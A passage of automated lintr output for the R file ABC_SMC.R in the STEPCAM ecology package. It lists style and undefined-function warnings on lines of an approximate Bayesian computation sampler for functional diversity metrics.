^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L113) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:5:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- d[, 1]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:119:5:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- d[, 2]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:120:5:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L120) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- d[, 3]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:136:5:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L136) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:137:28:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L137) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:137:28:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L137) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:12:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:29:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:149:19:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L149) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:149:19:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L149) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:151:19:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L151) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:35:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:152:45:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                            ^~~~~~~~\n```\n[R/ABC_SMC.R:152:55:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                                      ^~~~~~~~\n```\n[R/ABC_SMC.R:153:19:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L153) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:181:20:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L181) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:181:20:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L181) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:182:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L182) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:183:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L183) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:184:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L184) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L188) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L189) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L190) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L191) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:193:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L193) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:196:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L196) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L198) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:14:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L198) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:14:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L198) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:9:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:27:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:9:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:203:18:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:9:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:204:18:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:9:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:205:18:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:207:14:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L207) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:9:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n        ^~~~~~~\n```\n[R/ABC_SMC.R:208:17:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:9:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:209:16:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:9:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:210:16:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:9:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n        ^~~~~~\n```\n[R/ABC_SMC.R:211:16:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:11:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:23:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:39:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L214) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] = 1\n                                      ^\n```\n[R/ABC_SMC.R:216:11:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:23:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:39:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L216) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] =\n                                      ^\n```\n[R/ABC_SMC.R:217:13:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:53:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:217:63:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                              ^~~~~~~~\n```\n[R/ABC_SMC.R:218:29:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            compVals, weights)\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:221:13:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L221) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:221:14:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:34:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:21:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L227) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:227:22:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:229:13:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L229) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:229:38:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L229) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:240:5:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L240) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:240:17:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L240) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:241:5:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L241) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:241:17:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L241) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:242:5:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L242) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:242:17:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L242) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:243:16:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L243) *style:* **Variable and function names should be all lowercase.**\n```r\n​    weights <- nextWeights\n               ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:245:21:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L245) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:245:31:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L245) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:245:41:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L245) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:245:51:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L245) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                                  ^~~~~~~\n```\n[R/ABC_SMC.R:246:21:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                    ^~~~~~\n```\n[R/ABC_SMC.R:246:29:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                            ^~~~~~\n```\n[R/ABC_SMC.R:246:37:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                                    ^~~~~~\n```\n[R/ABC_SMC.R:247:54:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L247) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:250:1:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L250) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:250:19:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                  ^~~~~~~~\n```\n[R/ABC_SMC.R:250:35:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:250:51:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:251:9:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:32:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L251) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:251:37:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                                    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:254:5:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L254) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n    ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:254:26:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L254) *style:* **Commas should always have a space after.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^\n```\n[R/ABC_SMC.R:254:26:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L254) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:255:5:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L255) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:255:19:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L255) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:256:5:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:256:19:](https://github.com/thijsjanzen/STEPCAM/blob/7a6af664e3a64735d7f61b7a1b5efd52e4510212/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n                  